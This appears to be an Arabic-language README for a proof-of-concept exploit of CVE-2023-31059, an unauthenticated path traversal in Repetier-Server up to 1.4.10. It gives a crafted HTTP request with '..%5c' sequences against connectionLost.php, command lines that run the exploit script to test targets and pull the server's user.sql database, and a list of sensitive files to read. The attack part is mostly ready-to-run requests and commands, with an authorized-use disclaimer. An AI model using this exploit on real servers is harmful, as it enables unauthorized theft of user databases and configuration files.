
استغلال إثبات المفهوم لـ CVE-2023-31059، اجتياز مسار غير مصادق عليه في Repetier-Server ≤1.4.10، يمكن من قراءة ملفات تعسفية عبر طلبات HTTP مصممة.
المؤلف: Mohammed Idrees Banyamer
الدور: باحث أمني
البلد: الأردن 🇯🇴
استغلال إثبات مفهوم لثغرة اجتياز المسار عن بُعد / تضمين الملفات المحلية (LFI) بدون مصادقة في Repetier‑Server ≤ 1.4.10.
تسمح الثغرة بقراءة ملفات تعسفية عبر تسلسلات ..%5c مُعدّة في نقطة النهاية connectionLost.php.
| الحقل | القيمة |
|---|
| المنتج | Repetier‑Server |
| الإصدارات المتأثرة | ≤ 1.4.10 |
| CVE | CVE‑2023‑31059 |
| النوع | اجتياز المسار / تضمين الملفات المحلية (LFI) |
| المصادقة | لا شيء |
| ناقل الهجوم | الشبكة |
| الأثر | قراءة ملفات تعسفية |
| CVSS | 9.8 حرجة |
flowchart LR
A[Attacker] -->|HTTP request with ..%5c traversal| B[Repetier Server]
B --> C[base/connectionLost.php]
C -->|Unsanitized file parameter| D[Windows Filesystem]
D --> E[Sensitive File]
E --> B
B -->|File contents in HTTP response| AGET /base/connectionLost.php?file=..%5c..%5cWindows%5cwin.ini HTTP/1.1
Host: target:3344
# Test vulnerability
python3 CVE-2023-31059.py http://<target-ip>:3344/ --test
# Extract user database
python3 CVE-2023-31059.py http://<target-ip>:3344/ \
--file "ProgramData\\Repetier-Server\\database\\user.sql" \
--depth 20
pip install requests
ProgramData\Repetier-Server\database\user.sql
ProgramData\Repetier-Server\config.xml
Windows\win.ini
Windows\System32\drivers\etc\hosts
يُقدَّم إثبات المفهوم هذا لأغراض تعليمية واختبارات أمنية مصرّح بها فقط. استخدمه فقط على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها.
GitHub: https://github.com/mbanyamer